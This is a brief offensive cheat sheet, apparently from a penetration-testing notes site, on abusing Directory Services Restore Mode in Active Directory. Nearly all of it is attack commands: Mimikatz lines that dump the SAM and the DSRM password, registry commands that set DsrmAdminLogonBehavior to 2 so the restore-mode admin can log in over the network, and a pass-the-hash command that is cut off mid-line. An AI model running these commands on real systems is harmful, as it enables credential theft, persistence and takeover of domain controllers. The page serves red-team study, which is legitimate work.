DSRM
Directory Services Restore Mode
Dump DSRM password - dumps local users
look for the local administrator password
Invoke-Mimikatz -Command ‘”token::elevate” “lsadump::sam”’ -Computername <target>Change login behavior for the local admin on the DC
New-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2 -PropertyType DWORDIf property already exists
Set-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2Pass the hash for local admin
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<computer> /user:Administrator /ntlm:<hash> /run:powersLast updated
Was this helpful?